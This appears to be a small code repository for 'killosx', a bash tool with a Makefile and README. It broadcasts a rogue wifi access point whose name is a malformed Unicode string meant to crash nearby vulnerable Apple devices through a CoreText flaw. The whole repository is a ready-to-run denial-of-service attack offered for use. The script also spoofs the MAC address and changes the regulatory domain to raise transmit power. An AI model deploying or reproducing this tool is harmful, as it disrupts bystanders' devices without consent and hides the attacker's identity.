├── Makefile ├── README.md └── killosx.sh /Makefile: -------------------------------------------------------------------------------- 1 | install: 2 | cp killosx.sh /usr/bin/killosx 3 | chmod +x /usr/bin/killosx 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | killosx 2 | ======= 3 | 4 | Use Apple CoreText exploit (CVE-2012-3716) and launch an AP to affect all vulnerable Apple devices within wifi range. 5 | 6 | Installation: 7 | ======= 8 | 9 | Run 'make install' in the killosx directory. killosx can now be run from anywhere with 'killosx'. 10 | 11 | Usage: 12 | ======= 13 | killOSX 14 | Usage - killosx -i wlan0 ~ Run exploit on wlan0 15 | killosx -h ~ This help 16 | -------------------------------------------------------------------------------- /killosx.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ## killOSX Copyright 2013, d4rkcat (thed4rkcat@yandex.com) 4 | # 5 | ## This program is free software: you can redistribute it and/or modify 6 | ## it under the terms of the GNU General Public License as published by 7 | ## the Free Software Foundation, either version 3 of the License, or 8 | ## (at your option) any later version. 9 | # 10 | ## This program is distributed in the hope that it will be useful, 11 | ## but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | ## GNU General Public License at (http://www.gnu.org/licenses/) for 14 | ## more details. 15 | 16 | fexit() 17 | { 18 | echo 19 | airmon-ng stop $MON1 | grep fff 20 | echo $RED" [*] $MON1 has been shut down,$GRN Goodbye...$RST" 21 | exit 22 | } 23 | 24 | iw reg set BO 25 | RED=$(echo -e "\e[1;31m") 26 | BLU=$(echo -e "\e[1;36m") 27 | GRN=$(echo -e "\e[1;32m") 28 | RST=$(echo -e "\e[0;0;0m") 29 | 30 | trap fexit 2 31 | 32 | case $1 in 33 | "-i")NIC=$2;; 34 | "-h")echo $GRN"""killOSX$RST 35 | Usage - killosx -i wlan0 ~ Run exploit on wlan0 36 | killosx -h ~ This help";exit 37 | esac 38 | 39 | if [ $NIC -z ] 2> /dev/null 40 | then 41 | echo $RED""" [>] Which interface do you want to use?: 42 | " 43 | WLANS="$(ifconfig | grep wlan | cut -d ' ' -f 1)" 44 | for WLAN in $WLANS 45 | do 46 | echo " [>] $WLAN" 47 | done 48 | echo $BLU 49 | read -p " > wlan" NIC 50 | if [ ${NIC:0:4} = 'wlan' ] 2> /dev/null 51 | then 52 | A=1 53 | else 54 | NIC="wlan"$NIC 55 | fi 56 | echo $GRN;MON1=$(airmon-ng start $NIC | grep monitor | cut -d ' ' -f 5 | head -c -2);echo " [*] Started $NIC monitor on $MON1" 57 | else 58 | echo $GRN;MON1=$(airmon-ng start $NIC | grep monitor | cut -d ' ' -f 5 | head -c -2);echo " [*] Started $NIC monitor on $MON1" 59 | fi 60 | 61 | echo 62 | echo $GRN" [*] Changing MAC and attempting to boost power on $NIC" 63 | ifconfig $NIC down 64 | iwconfig $NIC txpower 30 2> /dev/null 65 | sleep 0.5 66 | ifconfig $NIC up 67 | echo 68 | ifconfig $MON1 down 69 | macchanger -a $MON1 70 | ifconfig $MON1 up 71 | 72 | echo $RED""" 73 | [*] Setting ESSID to 'سمَـَّوُوُحخ ̷̴̐خ ̷̴̐خ ̷̴̐خ امارتيخ ̷̴̐خ' 74 | [*] All vulnerable Osx in the area is toast. 75 | [>] Press Ctrl+C to exit 76 | "$BLU 77 | airbase-ng -e 'سمَـَّوُوُحخ ̷̴̐خ ̷̴̐خ ̷̴̐خ امارتيخ ̷̴̐خ' -I 50 -i $MON1 $MON1 78 | --------------------------------------------------------------------------------